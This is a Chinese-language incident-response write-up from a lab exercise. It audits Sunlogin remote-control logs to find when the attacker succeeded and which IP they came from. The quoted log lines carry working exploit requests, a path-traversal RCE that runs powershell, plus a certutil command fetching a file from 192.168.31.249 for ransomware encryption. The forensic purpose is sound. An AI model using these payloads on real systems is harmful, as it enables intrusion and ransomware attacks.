玄机——windows实战-向日葵
右键定位向日葵文件位置,进入logs文件夹把日志文件拿出来,审计重心主要放在sunlogon文件上。
2024-03-26 10:15:38.534 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64076-->192.168.31.114:49724
2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076, path: /, version: HTTP/1.1
2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076,/, plugin:, session:
2024-03-26 10:16:25.570 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64246-->192.168.31.114:49724
2024-03-26 10:16:25.570 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1
2024-03-26 10:16:25.570 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:
2024-03-26 10:16:25.585 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64247-->192.168.31.114:49724
2024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, version: HTTP/1.1
2024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, plugin:check, session:dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
2024-03-26 10:17:01.060 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64284-->192.168.31.114:49724
2024-03-26 10:17:01.060 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64284, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1
2024-03-26 10:17:01.060 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64284,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:
2024-03-26 10:17:01.075 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64285-->192.168.31.114:49724
2024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, version: HTTP/1.1
2024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, plugin:check, session:DTOAQFngEPZBDNNp5QLOYftzErN7RBCA
审计到日志的底端,我们可以发现其在尝试调用powershell来执行命令,而前面的操作都只是在读取敏感文件而非直接RCE,故我们可以得到黑客的攻击成功时间为2024-03-26 10:16:25.585,即Acceptor显示连接建立成功时,且我们也可以同时得到此黑客的攻击IP
分析黑客的下载命令,可以发现其从192.168.31.249来下载恶意文件并进行加密勒索。
2024-03-26 10:32:48.426 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49433, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmypublic.pem, version: HTTP/1.1
2024-03-26 10:32:48.426 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49433,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmypublic.pem, plugin:check, session:9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP
到了DEC解密这里毫无思路,看WP告诉我是之前echo的qq.txt是玄机群号,要加进去得到DEC解密文件,这里我们就直接从WP里面薅了。hash为5ad8d202f80202f6d31e077fc9b0fc6b.先使用DEC密钥走RSA解密密钥,再拿此密钥解密下文的AES加密。